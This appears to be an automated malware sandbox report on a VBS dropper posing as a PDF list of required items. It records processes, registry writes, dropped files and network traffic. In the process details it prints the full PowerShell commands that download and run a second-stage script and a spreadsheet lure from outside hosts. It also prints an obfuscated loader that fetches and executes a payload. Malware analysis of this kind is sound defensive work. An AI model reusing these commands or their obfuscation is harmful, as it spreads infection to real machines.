File name:

Listofrequireditemsandservicespdf.vbs

Full analysis: https://app.any.run/tasks/46a1ff9e-7920-461f-9798-b542e7fa719c
Verdict: Malicious activity
Analysis date: December 09, 2024, 17:51:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (2731), with CRLF line terminators
MD5:

32AABCE75F3FD75D0ECF7743BC6B9AFF

SHA1:

0F715B1CEAFEDDD4C80B294E91EC476AE3E8C0D0

SHA256:

21BEB442551B46EFBB7727A20784E6F047B4321DD3D8CCFCA94C256B9AD6E0BE

SSDEEP:

48:TJafb+vKVySHj3lS+Dkh1SFFMS1SBc24LlSMBbuSBlSMCSwVERbuSBBUS1R+nK:W6KjIXGno0nuSb+K

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 4128)

  • SUSPICIOUS

    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 1668)
      • wscript.exe (PID: 3688)
      • EXCEL.EXE (PID: 1224)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1668)

    • Starts process via Powershell

      • powershell.exe (PID: 1668)

    • The process executes VB scripts

      • powershell.exe (PID: 1668)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)

    • Uses WMIC.EXE to obtain physical disk drive information

      • wscript.exe (PID: 3688)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3688)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4244)
      • powershell.exe (PID: 4128)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • The process checks if it is being run in the virtual environment

      • svchost.exe (PID: 4976)

    • Connects to unusual port

      • svchost.exe (PID: 4976)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4244)

  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5728)
      • powershell.exe (PID: 1668)

    • Checks proxy server information

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)
      • msiexec.exe (PID: 2260)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 2324)
      • msiexec.exe (PID: 2260)

    • Disables trace logs

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3688)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Manual execution by a user

      • powershell.exe (PID: 4244)
      • svchost.exe (PID: 4976)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4244)
      • powershell.exe (PID: 4128)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4244)

    • Reads the software policy settings

      • msiexec.exe (PID: 2260)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4244)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
13
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs excel.exe msiexec.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1224"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
1668"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2260"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
2324wmic diskdrive get caption,serialnumberC:\Windows\System32\wbem\WMIC.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2972\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3688"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3816\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3848\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3952\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4128"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
33 100
Read events
32 854
Write events
225
Delete events
21

Modification events

(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000D3818DFE624ADB01
(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation:writeName:Excel.Sheet.12
Value:
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\1224
Operation:writeName:0
Value:
0B0E106365FD851A500D41B6AE2FD715A3D663230046B2D5E695B0CCD2ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C809D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
Executable files
1
Suspicious files
16
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
4128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kkxp1nne.y0l.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_taqru0hi.lxe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_piwvxdxm.3lo.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1224EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:1D950761921920766E7432100CAFE750
SHA256:0B91674674AF5002E186BD2EBF6BB23CDF8D5E64CE40FE92043419264E98EA5F
1224EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\lsm5k8gou5bjv.xlsx.LNKlnk
MD5:9FA224E3946D3E16F81F149A4CCE034A
SHA256:DEA826FE6F394A450753A064D3B48D3BC1FD49035F2BBBF09F74927CAFA63B26
1224EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Wef\CustomFunctions\v1.7\hostproperties.jsonbinary
MD5:7A29F1E157244591277E3C25F29A8029
SHA256:05EEBA4D6CA7148DCD0A6317A45241A49A4C8D88D628B27D8B19889EF6E70771
4244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5poqupwn.jgu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1224EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M7O67TCI8BJ1CJ65FELP.tempbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
4128powershell.exeC:\Users\admin\AppData\Roaming\Exultet.Bidtext
MD5:1C8EEA62BA17FC6DBA580BF2838B9E5A
SHA256:1B924838E7940222DCC7E76C15139882D57D0C0A3F3E8D14BA5C370EA5C8708F
1224EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:3D17834CC7D762D76A790CD537188DFD
SHA256:EA979024D529B64EF7FEBAF454035319D95F5C0258E348C0E4B372E70919200E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
39
DNS requests
15
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
HEAD
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
unknown
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2220
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/dictionary_words_bloom_filter.data
unknown
binary
117 Kb
whitelisted
GET
200
103.53.42.63:443
https://www.ftsengineers.com/it/Emnernes123.mdp
unknown
text
405 Kb
unknown
GET
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
s
2.50 Mb
whitelisted
GET
200
52.113.194.132:443
https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b85FD6563-501A-410D-B6AE-2FD715A3D663%7d&LabMachine=false
unknown
tss
370 Kb
whitelisted
POST
200
20.42.73.28:443
https://self.events.data.microsoft.com/OneCollector/1.0/
unknown
binary
9 b
whitelisted
GET
200
52.109.76.240:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
177 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2220
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2220
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1668
powershell.exe
209.124.66.28:443
www.tequila.ae
A2HOSTING
US
unknown
3976
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
www.tequila.ae
  • 209.124.66.28
unknown
www.ftsengineers.com
  • 103.53.42.63
unknown
www.fornid.com
  • 93.95.216.175
unknown
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted

Threats

PID
Process
Class
Message
4976
svchost.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Listofrequireditemsandservicespdf.vbs